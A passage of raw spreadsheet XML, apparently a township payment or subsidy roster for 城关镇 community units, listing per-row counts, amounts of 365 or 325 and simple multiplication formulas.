      <c r="K885" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="886" customHeight="1" spans="1:11">
      <c r="A886" s="23" t="s">
        <v>2382</v>
      </c>
      <c r="B886" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C886" s="24" t="s">
        <v>2337</v>
      </c>
      <c r="D886" s="24" t="s">
        <v>2383</v>
      </c>
      <c r="E886" s="24" t="s">
        <v>2086</v>
      </c>
      <c r="F886" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G886" s="24">
        <v>1</v>
      </c>
      <c r="H886" s="25">
        <v>365</v>
      </c>
      <c r="I886" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J886" s="41">
        <v>45108</v>
      </c>
      <c r="K886" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="887" customHeight="1" spans="1:11">
      <c r="A887" s="23" t="s">
        <v>2384</v>
      </c>
      <c r="B887" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C887" s="24" t="s">
        <v>2304</v>
      </c>
      <c r="D887" s="24" t="s">
        <v>2385</v>
      </c>
      <c r="E887" s="24" t="s">
        <v>2386</v>
      </c>
      <c r="F887" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G887" s="24">
        <v>2</v>
      </c>
      <c r="H887" s="25">
        <v>325</v>
      </c>
      <c r="I887" s="24">
        <f t="shared" si="13"/>
        <v>650</v>
      </c>
      <c r="J887" s="41">
        <v>45108</v>
      </c>
      <c r="K887" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="888" customHeight="1" spans="1:11">
      <c r="A888" s="23" t="s">
        <v>2387</v>
      </c>
      <c r="B888" s="24" t="str">
        <f>B887</f>
        <v>城关镇</v>
      </c>
      <c r="C888" s="24" t="str">
        <f>C887</f>
        <v>中华社区物资局</v>
      </c>
      <c r="D888" s="30" t="s">
        <v>2388</v>
      </c>
      <c r="E888" s="30" t="s">
        <v>2389</v>
      </c>
      <c r="F888" s="24" t="str">
        <f>F887</f>
        <v>4113210108</v>
      </c>
      <c r="G888" s="24"/>
      <c r="H888" s="24"/>
      <c r="I888" s="24">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="J888" s="41"/>
      <c r="K888" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="889" customHeight="1" spans="1:11">
      <c r="A889" s="23" t="s">
        <v>2390</v>
      </c>
      <c r="B889" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C889" s="24" t="s">
        <v>2304</v>
      </c>
      <c r="D889" s="24" t="s">
        <v>2391</v>
      </c>
      <c r="E889" s="24" t="s">
        <v>611</v>
      </c>
      <c r="F889" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G889" s="24">
        <v>1</v>
      </c>
      <c r="H889" s="25">
        <v>365</v>
      </c>
      <c r="I889" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J889" s="41">
        <v>45108</v>
      </c>
      <c r="K889" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="890" customHeight="1" spans="1:11">
      <c r="A890" s="23" t="s">
        <v>2392</v>
      </c>
      <c r="B890" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C890" s="24" t="s">
        <v>2304</v>
      </c>
      <c r="D890" s="24" t="s">
        <v>2393</v>
      </c>
      <c r="E890" s="24" t="s">
        <v>519</v>
      </c>
      <c r="F890" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G890" s="24">
        <v>1</v>
      </c>
      <c r="H890" s="25">
        <v>365</v>
      </c>
      <c r="I890" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J890" s="41">
        <v>45108</v>
      </c>
      <c r="K890" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="891" customHeight="1" spans="1:11">
      <c r="A891" s="23" t="s">
        <v>2394</v>
      </c>
      <c r="B891" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C891" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D891" s="24" t="s">
        <v>2395</v>
      </c>
      <c r="E891" s="24" t="s">
        <v>2253</v>
      </c>
      <c r="F891" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G891" s="24">
        <v>1</v>
      </c>
      <c r="H891" s="25">
        <v>365</v>
      </c>
      <c r="I891" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J891" s="41">
        <v>45108</v>
      </c>
      <c r="K891" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="892" customHeight="1" spans="1:11">
      <c r="A892" s="23" t="s">
        <v>2396</v>
      </c>
      <c r="B892" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C892" s="24" t="s">
        <v>2345</v>
      </c>
      <c r="D892" s="24" t="s">
        <v>812</v>
      </c>
      <c r="E892" s="24" t="s">
        <v>232</v>
      </c>
      <c r="F892" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G892" s="24">
        <v>1</v>
      </c>
      <c r="H892" s="25">
        <v>365</v>
      </c>
      <c r="I892" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J892" s="41">
        <v>45108</v>
      </c>
      <c r="K892" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="893" customHeight="1" spans="1:11">
      <c r="A893" s="23" t="s">
        <v>2397</v>
      </c>
      <c r="B893" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C893" s="24" t="s">
        <v>2398</v>
      </c>
      <c r="D893" s="24" t="s">
        <v>2399</v>
      </c>
      <c r="E893" s="24" t="s">
        <v>697</v>
      </c>
      <c r="F893" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G893" s="24">
        <v>1</v>
      </c>
      <c r="H893" s="25">
        <v>365</v>
      </c>
      <c r="I893" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J893" s="41">
        <v>45108</v>
      </c>
      <c r="K893" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="894" customHeight="1" spans="1:11">
      <c r="A894" s="23" t="s">
        <v>2400</v>
      </c>
      <c r="B894" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C894" s="24" t="s">
        <v>2401</v>
      </c>
      <c r="D894" s="24" t="s">
        <v>2402</v>
      </c>
      <c r="E894" s="24" t="s">
        <v>2403</v>
      </c>
      <c r="F894" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G894" s="24">
        <v>1</v>
      </c>
      <c r="H894" s="25">
        <v>365</v>
      </c>
      <c r="I894" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J894" s="41">
        <v>45108</v>
      </c>
      <c r="K894" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="895" customHeight="1" spans="1:11">
      <c r="A895" s="23" t="s">
        <v>2404</v>
      </c>
      <c r="B895" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C895" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D895" s="24" t="s">
        <v>2405</v>
      </c>
      <c r="E895" s="24" t="s">
        <v>284</v>
      </c>
      <c r="F895" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G895" s="24">
        <v>1</v>
      </c>
      <c r="H895" s="25">
        <v>365</v>
      </c>
      <c r="I895" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J895" s="41">
        <v>45108</v>
      </c>
      <c r="K895" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="896" customHeight="1" spans="1:11">
      <c r="A896" s="23" t="s">
        <v>2406</v>
      </c>
      <c r="B896" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C896" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D896" s="24" t="s">
        <v>2407</v>
      </c>
      <c r="E896" s="24" t="s">
        <v>552</v>
      </c>
      <c r="F896" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G896" s="24">
        <v>1</v>
      </c>
      <c r="H896" s="25">
        <v>365</v>
      </c>
      <c r="I896" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J896" s="41">
        <v>45108</v>
      </c>
      <c r="K896" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="897" customHeight="1" spans="1:11">
      <c r="A897" s="23" t="s">
        <v>2408</v>
      </c>
      <c r="B897" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C897" s="24" t="s">
        <v>2362</v>
      </c>
      <c r="D897" s="24" t="s">
        <v>2409</v>
      </c>
      <c r="E897" s="24" t="s">
        <v>2410</v>
      </c>
      <c r="F897" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G897" s="24">
        <v>1</v>
      </c>
      <c r="H897" s="25">
        <v>365</v>
      </c>
      <c r="I897" s="24">
        <f t="shared" si="13"/>
        <v>365</v>
      </c>
      <c r="J897" s="41">
        <v>45108</v>
      </c>
      <c r="K897" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="898" customHeight="1" spans="1:11">
      <c r="A898" s="23" t="s">
        <v>2411</v>
      </c>
      <c r="B898" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C898" s="24" t="s">
        <v>2345</v>
      </c>
      <c r="D898" s="24" t="s">
        <v>2412</v>
      </c>
      <c r="E898" s="24" t="s">
        <v>2413</v>
      </c>
      <c r="F898" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G898" s="24">
        <v>2</v>
      </c>
      <c r="H898" s="25">
        <v>325</v>
      </c>
      <c r="I898" s="24">
        <f t="shared" si="13"/>
        <v>650</v>
      </c>
      <c r="J898" s="41">
        <v>45108</v>
      </c>
      <c r="K898" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="899" customHeight="1" spans="1:11">
      <c r="A899" s="23" t="s">
        <v>2414</v>
      </c>
      <c r="B899" s="24" t="str">
        <f>B898</f>
        <v>城关镇</v>
      </c>
      <c r="C899" s="24" t="str">
        <f>C898</f>
        <v>中华社区商业中心</v>
      </c>
      <c r="D899" s="30" t="s">
        <v>2415</v>
      </c>
      <c r="E899" s="30" t="s">
        <v>2416</v>
      </c>
      <c r="F899" s="24" t="str">
        <f>F898</f>
        <v>4113210108</v>
      </c>
      <c r="G899" s="24"/>
      <c r="H899" s="24"/>
      <c r="I899" s="24">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="J899" s="41"/>
      <c r="K899" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="900" customHeight="1" spans="1:11">
      <c r="A900" s="23" t="s">
        <v>2417</v>
      </c>
      <c r="B900" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C900" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D900" s="24" t="s">
        <v>2418</v>
      </c>
      <c r="E900" s="24" t="s">
        <v>2419</v>
      </c>
      <c r="F900" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G900" s="24">
        <v>1</v>
      </c>
      <c r="H900" s="25">
        <v>365</v>
      </c>
      <c r="I900" s="24">
        <f t="shared" ref="I900:I963" si="14">H900*G900</f>
        <v>365</v>
      </c>
      <c r="J900" s="41">
        <v>45108</v>
      </c>
      <c r="K900" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="901" customHeight="1" spans="1:11">
      <c r="A901" s="23" t="s">
        <v>2420</v>
      </c>
      <c r="B901" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C901" s="24" t="s">
        <v>2304</v>
      </c>
      <c r="D901" s="24" t="s">
        <v>2421</v>
      </c>
      <c r="E901" s="24" t="s">
        <v>589</v>
      </c>
      <c r="F901" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G901" s="24">
        <v>2</v>
      </c>
      <c r="H901" s="25">
        <v>325</v>
      </c>
      <c r="I901" s="24">
        <f t="shared" si="14"/>
        <v>650</v>
      </c>
      <c r="J901" s="41">
        <v>45108</v>
      </c>
      <c r="K901" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="902" customHeight="1" spans="1:11">
      <c r="A902" s="23" t="s">
        <v>2422</v>
      </c>
      <c r="B902" s="24" t="str">
        <f>B901</f>
        <v>城关镇</v>
      </c>
      <c r="C902" s="24" t="str">
        <f>C901</f>
        <v>中华社区物资局</v>
      </c>
      <c r="D902" s="30" t="s">
        <v>2423</v>
      </c>
      <c r="E902" s="31" t="s">
        <v>474</v>
      </c>
      <c r="F902" s="24" t="str">
        <f>F901</f>
        <v>4113210108</v>
      </c>
      <c r="G902" s="24"/>
      <c r="H902" s="24"/>
      <c r="I902" s="24">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="J902" s="41"/>
      <c r="K902" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="903" customHeight="1" spans="1:11">
      <c r="A903" s="23" t="s">
        <v>2424</v>
      </c>
      <c r="B903" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C903" s="24" t="s">
        <v>2345</v>
      </c>
      <c r="D903" s="24" t="s">
        <v>2425</v>
      </c>
      <c r="E903" s="24" t="s">
        <v>662</v>
      </c>
      <c r="F903" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G903" s="24">
        <v>1</v>
      </c>
      <c r="H903" s="25">
        <v>365</v>
      </c>
      <c r="I903" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J903" s="41">
        <v>45108</v>
      </c>
      <c r="K903" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="904" customHeight="1" spans="1:11">
      <c r="A904" s="23" t="s">
        <v>2426</v>
      </c>
      <c r="B904" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C904" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D904" s="24" t="s">
        <v>2427</v>
      </c>
      <c r="E904" s="24" t="s">
        <v>334</v>
      </c>
      <c r="F904" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G904" s="24">
        <v>1</v>
      </c>
      <c r="H904" s="25">
        <v>365</v>
      </c>
      <c r="I904" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J904" s="41">
        <v>45108</v>
      </c>
      <c r="K904" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="905" customHeight="1" spans="1:11">
      <c r="A905" s="23" t="s">
        <v>2428</v>
      </c>
      <c r="B905" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C905" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D905" s="24" t="s">
        <v>2429</v>
      </c>
      <c r="E905" s="24" t="s">
        <v>432</v>
      </c>
      <c r="F905" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G905" s="24">
        <v>2</v>
      </c>
      <c r="H905" s="25">
        <v>325</v>
      </c>
      <c r="I905" s="24">
        <f t="shared" si="14"/>
        <v>650</v>
      </c>
      <c r="J905" s="41">
        <v>45108</v>
      </c>
      <c r="K905" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="906" customHeight="1" spans="1:11">
      <c r="A906" s="23" t="s">
        <v>2430</v>
      </c>
      <c r="B906" s="24" t="str">
        <f>B905</f>
        <v>城关镇</v>
      </c>
      <c r="C906" s="24" t="str">
        <f>C905</f>
        <v>中华社区工信局</v>
      </c>
      <c r="D906" s="31" t="s">
        <v>2431</v>
      </c>
      <c r="E906" s="31" t="s">
        <v>2432</v>
      </c>
      <c r="F906" s="24" t="str">
        <f>F905</f>
        <v>4113210108</v>
      </c>
      <c r="G906" s="24"/>
      <c r="H906" s="24"/>
      <c r="I906" s="24">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="J906" s="41"/>
      <c r="K906" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="907" customHeight="1" spans="1:11">
      <c r="A907" s="23" t="s">
        <v>2433</v>
      </c>
      <c r="B907" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C907" s="24" t="s">
        <v>2434</v>
      </c>
      <c r="D907" s="24" t="s">
        <v>2435</v>
      </c>
      <c r="E907" s="24" t="s">
        <v>627</v>
      </c>
      <c r="F907" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G907" s="24">
        <v>1</v>
      </c>
      <c r="H907" s="25">
        <v>365</v>
      </c>
      <c r="I907" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J907" s="41">
        <v>45108</v>
      </c>
      <c r="K907" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="908" customHeight="1" spans="1:11">
      <c r="A908" s="23" t="s">
        <v>2436</v>
      </c>
      <c r="B908" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C908" s="24" t="s">
        <v>2437</v>
      </c>
      <c r="D908" s="24" t="s">
        <v>2438</v>
      </c>
      <c r="E908" s="24" t="s">
        <v>239</v>
      </c>
      <c r="F908" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G908" s="24">
        <v>2</v>
      </c>
      <c r="H908" s="25">
        <v>325</v>
      </c>
      <c r="I908" s="24">
        <f t="shared" si="14"/>
        <v>650</v>
      </c>
      <c r="J908" s="41">
        <v>45108</v>
      </c>
      <c r="K908" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="909" customHeight="1" spans="1:11">
      <c r="A909" s="23" t="s">
        <v>2439</v>
      </c>
      <c r="B909" s="24" t="str">
        <f>B908</f>
        <v>城关镇</v>
      </c>
      <c r="C909" s="24" t="str">
        <f>C908</f>
        <v>中华社区交通局</v>
      </c>
      <c r="D909" s="23" t="s">
        <v>2440</v>
      </c>
      <c r="E909" s="24" t="s">
        <v>1866</v>
      </c>
      <c r="F909" s="24" t="str">
        <f>F908</f>
        <v>4113210108</v>
      </c>
      <c r="G909" s="24"/>
      <c r="H909" s="24"/>
      <c r="I909" s="24">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="J909" s="41"/>
      <c r="K909" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="910" customHeight="1" spans="1:11">
      <c r="A910" s="23" t="s">
        <v>2441</v>
      </c>
      <c r="B910" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C910" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D910" s="24" t="s">
        <v>2442</v>
      </c>
      <c r="E910" s="24" t="s">
        <v>1024</v>
      </c>
      <c r="F910" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G910" s="24">
        <v>1</v>
      </c>
      <c r="H910" s="25">
        <v>365</v>
      </c>
      <c r="I910" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J910" s="41">
        <v>45108</v>
      </c>
      <c r="K910" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="911" customHeight="1" spans="1:11">
      <c r="A911" s="23" t="s">
        <v>2443</v>
      </c>
      <c r="B911" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C911" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D911" s="24" t="s">
        <v>2444</v>
      </c>
      <c r="E911" s="24" t="s">
        <v>2445</v>
      </c>
      <c r="F911" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G911" s="24">
        <v>1</v>
      </c>
      <c r="H911" s="25">
        <v>365</v>
      </c>
      <c r="I911" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J911" s="41">
        <v>45108</v>
      </c>
      <c r="K911" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="912" customHeight="1" spans="1:11">
      <c r="A912" s="23" t="s">
        <v>2446</v>
      </c>
      <c r="B912" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C912" s="24" t="s">
        <v>2345</v>
      </c>
      <c r="D912" s="24" t="s">
        <v>2447</v>
      </c>
      <c r="E912" s="24" t="s">
        <v>397</v>
      </c>
      <c r="F912" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G912" s="24">
        <v>2</v>
      </c>
      <c r="H912" s="25">
        <v>325</v>
      </c>
      <c r="I912" s="24">
        <f t="shared" si="14"/>
        <v>650</v>
      </c>
      <c r="J912" s="41">
        <v>45108</v>
      </c>
      <c r="K912" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="913" customHeight="1" spans="1:11">
      <c r="A913" s="23" t="s">
        <v>2448</v>
      </c>
      <c r="B913" s="24" t="str">
        <f>B912</f>
        <v>城关镇</v>
      </c>
      <c r="C913" s="24" t="str">
        <f>C912</f>
        <v>中华社区商业中心</v>
      </c>
      <c r="D913" s="23" t="s">
        <v>2449</v>
      </c>
      <c r="E913" s="23" t="s">
        <v>292</v>
      </c>
      <c r="F913" s="24" t="str">
        <f>F912</f>
        <v>4113210108</v>
      </c>
      <c r="G913" s="24"/>
      <c r="H913" s="24"/>
      <c r="I913" s="24">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="J913" s="41"/>
      <c r="K913" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="914" customHeight="1" spans="1:11">
      <c r="A914" s="23" t="s">
        <v>2450</v>
      </c>
      <c r="B914" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C914" s="24" t="s">
        <v>2337</v>
      </c>
      <c r="D914" s="24" t="s">
        <v>2451</v>
      </c>
      <c r="E914" s="24" t="s">
        <v>753</v>
      </c>
      <c r="F914" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G914" s="24">
        <v>1</v>
      </c>
      <c r="H914" s="25">
        <v>365</v>
      </c>
      <c r="I914" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J914" s="41">
        <v>45108</v>
      </c>
      <c r="K914" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="915" customHeight="1" spans="1:11">
      <c r="A915" s="23" t="s">
        <v>2452</v>
      </c>
      <c r="B915" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C915" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D915" s="24" t="s">
        <v>2453</v>
      </c>
      <c r="E915" s="24" t="s">
        <v>627</v>
      </c>
      <c r="F915" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G915" s="24">
        <v>1</v>
      </c>
      <c r="H915" s="25">
        <v>365</v>
      </c>
      <c r="I915" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J915" s="41">
        <v>45108</v>
      </c>
      <c r="K915" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="916" customHeight="1" spans="1:11">
      <c r="A916" s="23" t="s">
        <v>2454</v>
      </c>
      <c r="B916" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C916" s="24" t="s">
        <v>2362</v>
      </c>
      <c r="D916" s="24" t="s">
        <v>2455</v>
      </c>
      <c r="E916" s="24" t="s">
        <v>292</v>
      </c>
      <c r="F916" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G916" s="24">
        <v>1</v>
      </c>
      <c r="H916" s="25">
        <v>365</v>
      </c>
      <c r="I916" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J916" s="41">
        <v>45108</v>
      </c>
      <c r="K916" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="917" customHeight="1" spans="1:11">
      <c r="A917" s="23" t="s">
        <v>2456</v>
      </c>
      <c r="B917" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C917" s="24" t="s">
        <v>2345</v>
      </c>
      <c r="D917" s="24" t="s">
        <v>2457</v>
      </c>
      <c r="E917" s="24" t="s">
        <v>950</v>
      </c>
      <c r="F917" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G917" s="24">
        <v>1</v>
      </c>
      <c r="H917" s="25">
        <v>365</v>
      </c>
      <c r="I917" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J917" s="41">
        <v>45108</v>
      </c>
      <c r="K917" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="918" customHeight="1" spans="1:11">
      <c r="A918" s="23" t="s">
        <v>2458</v>
      </c>
      <c r="B918" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C918" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D918" s="24" t="s">
        <v>2459</v>
      </c>
      <c r="E918" s="24" t="s">
        <v>222</v>
      </c>
      <c r="F918" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G918" s="24">
        <v>1</v>
      </c>
      <c r="H918" s="25">
        <v>365</v>
      </c>
      <c r="I918" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J918" s="41">
        <v>45108</v>
      </c>
      <c r="K918" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="919" customHeight="1" spans="1:11">
      <c r="A919" s="23" t="s">
        <v>2460</v>
      </c>
      <c r="B919" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C919" s="24" t="s">
        <v>2362</v>
      </c>
      <c r="D919" s="24" t="s">
        <v>2461</v>
      </c>
      <c r="E919" s="24" t="s">
        <v>222</v>
      </c>
      <c r="F919" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G919" s="24">
        <v>2</v>
      </c>
      <c r="H919" s="25">
        <v>325</v>
      </c>
      <c r="I919" s="24">
        <f t="shared" si="14"/>
        <v>650</v>
      </c>
      <c r="J919" s="41">
        <v>45108</v>
      </c>
      <c r="K919" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="920" customHeight="1" spans="1:11">
      <c r="A920" s="23" t="s">
        <v>2462</v>
      </c>
      <c r="B920" s="24" t="str">
        <f>B919</f>
        <v>城关镇</v>
      </c>
      <c r="C920" s="24" t="str">
        <f>C919</f>
        <v>中华社区外贸局</v>
      </c>
      <c r="D920" s="23" t="s">
        <v>2463</v>
      </c>
      <c r="E920" s="23" t="s">
        <v>2464</v>
      </c>
      <c r="F920" s="24" t="str">
        <f>F919</f>
        <v>4113210108</v>
      </c>
      <c r="G920" s="24"/>
      <c r="H920" s="24"/>
      <c r="I920" s="24">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="J920" s="41"/>
      <c r="K920" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="921" customHeight="1" spans="1:11">
      <c r="A921" s="23" t="s">
        <v>2465</v>
      </c>
      <c r="B921" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C921" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D921" s="24" t="s">
        <v>2466</v>
      </c>
      <c r="E921" s="24" t="s">
        <v>2467</v>
      </c>
      <c r="F921" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G921" s="24">
        <v>1</v>
      </c>
      <c r="H921" s="25">
        <v>365</v>
      </c>
      <c r="I921" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J921" s="41">
        <v>45108</v>
      </c>
      <c r="K921" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="922" customHeight="1" spans="1:11">
      <c r="A922" s="23" t="s">
        <v>2468</v>
      </c>
      <c r="B922" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C922" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D922" s="24" t="s">
        <v>2469</v>
      </c>
      <c r="E922" s="24" t="s">
        <v>1622</v>
      </c>
      <c r="F922" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G922" s="24">
        <v>1</v>
      </c>
      <c r="H922" s="25">
        <v>365</v>
      </c>
      <c r="I922" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J922" s="41">
        <v>45108</v>
      </c>
      <c r="K922" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="923" customHeight="1" spans="1:11">
      <c r="A923" s="23" t="s">
        <v>2470</v>
      </c>
      <c r="B923" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C923" s="24" t="s">
        <v>2304</v>
      </c>
      <c r="D923" s="24" t="s">
        <v>2471</v>
      </c>
      <c r="E923" s="24" t="s">
        <v>2472</v>
      </c>
      <c r="F923" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G923" s="24">
        <v>1</v>
      </c>
      <c r="H923" s="25">
        <v>365</v>
      </c>
      <c r="I923" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J923" s="41">
        <v>45108</v>
      </c>
      <c r="K923" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="924" customHeight="1" spans="1:11">
      <c r="A924" s="23" t="s">
        <v>2473</v>
      </c>
      <c r="B924" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C924" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D924" s="24" t="s">
        <v>2474</v>
      </c>
      <c r="E924" s="24" t="s">
        <v>2475</v>
      </c>
      <c r="F924" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G924" s="24">
        <v>1</v>
      </c>
      <c r="H924" s="25">
        <v>365</v>
      </c>
      <c r="I924" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J924" s="41">
        <v>45108</v>
      </c>
      <c r="K924" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="925" customHeight="1" spans="1:11">
      <c r="A925" s="23" t="s">
        <v>2476</v>
      </c>
      <c r="B925" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C925" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D925" s="24" t="s">
        <v>2477</v>
      </c>
      <c r="E925" s="24" t="s">
        <v>669</v>
      </c>
      <c r="F925" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G925" s="24">
        <v>1</v>
      </c>
      <c r="H925" s="25">
        <v>365</v>
      </c>
      <c r="I925" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J925" s="41">
        <v>45108</v>
      </c>
      <c r="K925" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="926" customHeight="1" spans="1:11">
      <c r="A926" s="23" t="s">
        <v>2478</v>
      </c>
